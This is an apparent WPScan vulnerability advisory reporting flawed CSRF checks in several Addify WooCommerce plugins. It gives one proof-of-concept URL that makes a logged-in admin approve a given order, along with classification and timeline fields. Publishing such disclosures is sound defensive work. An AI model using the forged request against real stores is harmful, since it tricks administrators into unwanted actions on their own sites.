WordPress Plugin Vulnerabilities
Multiple Plugins from Addify - Multiple CSRF
Description
The plugins have flawed CSRF checks in various places, which could allow attackers to make logged in users perform unwanted actions
Proof of Concept
[addify-order-approval-woocommerce] - To make a logged in admin approve the order with ID 103 https://example.com/wp-admin/edit.php?s=&post_status=all&post_type=shop_order&action=approved&m=0&_customer_user=&paged=1&post%5B%5D=103&action2=approved
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScan
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-07-10 (about 4 months ago)
Added
2023-07-10 (about 4 months ago)
Last Updated
2023-10-18 (about 1 months ago)